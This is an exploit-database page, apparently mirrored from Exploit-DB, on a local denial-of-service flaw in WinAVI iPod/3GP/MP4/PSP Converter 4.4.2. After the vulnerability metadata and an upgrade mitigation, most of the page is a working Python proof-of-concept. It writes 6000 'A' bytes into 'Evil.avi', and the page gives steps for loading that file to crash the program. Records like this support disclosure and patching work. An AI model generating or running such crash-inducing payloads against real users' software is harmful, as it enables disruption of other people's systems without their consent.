WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 Local Dos Exploit

vendor:

WinAVI iPod/3GP/MP4/PSP Converter

by:

Achilles

7.8

CVSS

HIGH

Local Denial of Service

400

CWE

Product Name: WinAVI iPod/3GP/MP4/PSP Converter

Affected Version From: 4.4.2

Affected Version To: 4.4.2

Patch Exists: YES

Related CWE: N/A

CPE: a:winavi:winavi_ipod/3gp/mp4/psp_converter

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows XP SP3 EN, Windows 7 x64 Sp1

2019

WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 Local Dos Exploit

A Local Denial of Service vulnerability exists in WinAVI iPod/3GP/MP4/PSP Converter 4.4.2. An attacker can create a malicious AVI file with 6000 bytes of 'A' characters and open it in WinAVI.exe to cause a crash.

Mitigation:

Upgrade to the latest version of WinAVI iPod/3GP/MP4/PSP Converter.

Source

Exploit-DB raw data:

# Exploit Title: WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 Local Dos Exploit
# Date: 16.03.2019
# Vendor Homepage:http://www.winavi.com
# Software Link:  http://www.winavi.com/user/download/WinAVI_iPod_3GP_MP4_PSP_Converter.exe
# Exploit Author: Achilles
# Tested Version: 4.4.2
# Tested on: Windows XP SP3 EN
#            Windows 7 x64 Sp1


# 1.- Run the python script, it will create a new file with the name "Evil.avi"
# 2.- Open WinAVI.exe and Click 'Convert to iPhone'
# 3.- Load the file "Evil.avi"
# 4.- And you will see a crash.



#!/usr/bin/env python
buffer = "\x41" * 6000

try:
	f=open("Evil.avi","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"